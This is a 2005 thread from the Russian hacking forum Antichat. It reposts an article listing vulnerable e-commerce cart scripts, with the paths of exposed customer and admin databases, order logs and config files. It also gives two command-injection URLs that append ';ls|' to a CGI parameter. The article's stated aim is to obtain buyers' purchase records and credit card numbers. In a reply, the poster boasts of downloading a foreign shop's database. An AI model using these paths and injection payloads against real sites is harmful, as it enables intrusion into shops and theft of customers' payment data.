ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Чужие Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости онлайн магазинов
  #1  
Старый 09.06.2005, 19:25
Аватар для k00p3r
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586

Репутация: 16


Отправить сообщение для k00p3r с помощью ICQ
По умолчанию Уязвимости онлайн магазинов

Уязвимости онлайн магазинов

В этой статье я расскажу о нескольких уязвимых корзинах и способах, используя которые, можно получить инфу о покупках и соответственно кредитных картах.

Начнем...

Первым номером у нас идет корзинка под названием SalesCart (www.salescart.com)
Обладает приятной особенностью 8) Удаленный зарегистрированный пользователь может получить доступ к персональным данным других пользователей (типа номеров кредитных карточек =). Эта информация хранится в файле shop.mdb, который доступен любому пользователю.

ClickCartPro
Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере.

http://www.server.com/data/site/admin_user.db
http://www.server.com/cp/data/site/admin_user.db
http://www.server.com/data/cp/site/admin_user.db

База admin_user содержит пароли администраторов сайта. =)

MetaLinks MetaCart2.sql
Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных.

http://www.server.com/database/metac...e/metacart.mdb

WebDiscount eShop
Позволяет исполнять команды.
http://www.server.com/cgi-bin/eshop.pl?seite=;ls|

Shopping Cart
Позволяет исполнять команды.
http://www.server.com/cgi-local/shop.pl/page=;ls|

QuikStore
Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера.

http://www.server.com/cgi-bin/quikst...0html&cart_id=
Конфигурация хранится в файле: quikstore.cfg

Order Form v1.2
Открытая для просмотра директория : /Orders/ , order/ , /orders/ , etc...
Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat)

Seaside Enterprises EZMall 2000
Исполняемый файл: mall2000.cgi
Открытая для просмотра директория: /mall_log_files/
Открытая информация о заказах: order.log

PDGSoft's PDG Shopping Cart 1.5
Исполняемый файл: shopper.cgi
Открытая для просмотра директория: /PDG_Cart/
Открытая информация о заказах: order.log
Конфигурация хранится в файле: shopper.conf

Mercantec's SoftCart
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /orders/ и /pw/
Открытая информация о заказах: /orders/*.olf
Конфигурация хранится в файле: /pw/storemgr.pw

Perlshop
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /store/customers/ и /store/temp_customers/
Открытая информация о заказах: Файлы с цифровыми именами (8 знаков)

WebShop
Исполняемый файл: WebShop.cgi
Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt

И вот буквально только что , пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там... Ышо одна дырявая корзинка =)

Alan Ward's A-Cart
(http://www.alanward.net/acart/) - система осуществления покупок через Web, разработанная в ASP для Windows систем.
Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт).

Ну вот для первого раза хватит =)


Автор: 1dt.w0lf
 
Ответить с цитированием

  #2  
Старый 09.06.2005, 19:33
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Я считаю, что это уже старые уязвимости или уже давно прикрытые.. вот и в паблике лежат. =)
 
Ответить с цитированием

  #3  
Старый 09.06.2005, 19:35
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

для общего развития пойдет -)
 
Ответить с цитированием

  #4  
Старый 09.06.2005, 19:45
Аватар для k00p3r
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586

Репутация: 16


Отправить сообщение для k00p3r с помощью ICQ
По умолчанию

Нет...сам лично скачал с какогото буржуйского сайта их базу шопа...кажись вот этот скрипт магаза - MetaLinks MetaCart
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ